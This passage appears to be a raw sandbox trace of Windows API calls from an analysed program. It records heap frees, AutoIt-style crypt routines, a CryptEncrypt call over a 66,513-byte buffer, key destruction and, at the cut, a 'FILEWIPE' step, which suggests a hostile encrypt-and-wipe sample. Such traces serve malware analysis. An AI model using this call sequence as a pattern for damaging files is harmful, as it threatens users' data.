| out: hHeap=0x8a0000) returned 1 [0191.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0191.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0191.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0191.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0191.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0191.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0191.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0191.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0191.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0191.368] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.368] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c26a8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c26a8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0191.368] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.368] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.368] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.368] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.368] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.368] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0191.368] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.368] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.368] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0191.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0191.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0191.368] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.368] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0191.369] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0191.369] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0191.369] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.369] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0191.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0191.369] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.369] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0191.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0191.369] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.369] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.369] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.369] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0191.369] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.369] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0191.369] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.370] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.370] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x103c4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x103d0) returned 1 [0191.370] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.370] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0191.370] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.370] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.370] CharLowerBuffW (in: lpsz="byte[66513]", cchLength=0xb | out: lpsz="byte[66513]") returned 0xb [0191.370] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.371] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.371] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.371] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.371] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.371] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa6f3d8*, pdwDataLen=0x87e820*=0x103c4, dwBufLen=0x103d0 | out: pbData=0xa6f3d8*, pdwDataLen=0x87e820*=0x103d0) returned 1 [0191.372] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.372] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0191.372] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.372] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.372] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.372] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.372] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0191.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0191.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.372] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.373] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0191.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.373] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.373] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0191.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0191.373] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.373] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.373] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0191.373] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0191.373] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0191.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0191.373] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.379] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.379] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0191.379] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.384] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.384] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.384] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0191.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0191.385] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.385] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.385] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0191.385] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.385] CryptDestroyKey (hKey=0x90af98) returned 1 [0191.385] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.385] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.385] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0191.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0191.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0191.385] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0191.385] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0191.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0191.386] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0191.386] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0191.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0191.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0191.386] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0191.386] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.386] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0191.386] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0191.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0191.386] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0191.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0191.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0191.386] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.386] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.386] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.386] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0191.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0191.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0191.386] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.386] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0191.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0191.386] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.387] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0191.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0191.387] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.387] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0191.387] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0191.387] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.387] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0191.387] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0191.387] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0191.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0191.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0191.387] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0191.387] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.387] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0191.387] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.387] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0191.387] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0191.387] FreeLibrary (hLibModule=0x74f20000) returned 1 [0191.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0191.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0191.388] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0191.388] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0191.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0191.388] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.388] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.389] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.390] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.390] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") 